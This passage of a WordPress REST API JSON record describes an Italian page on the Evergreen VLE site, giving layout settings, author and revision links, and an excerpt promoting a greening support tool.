Partner<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-28323","page","type-page","status-publish","hentry"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":false,"author_link":"https:\/\/evergreen-vle.eu\/it\/author\/admin_evergreen\/"},"uagb_comment_info":0,"uagb_excerpt":"Iniziate subito il vostro processo di ecologizzazione! Il nostro strumento di supporto vi guider\u00e0 attraverso i passi da compiere&nbsp; Benefici Partner","_links":{"self":[{"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/pages\/28323","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/comments?post=28323"}],"version-history":[{"count":7,"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/pages\/28323\/revisions"}],"predecessor-version":[{"id":31064,"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/pages\/28323\/revisions\/31064"}],"wp:attachment":[{"href":"https:\/\/evergreen-vle.eu\/it\/wp-json\/wp\/v2\/media?parent=28323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}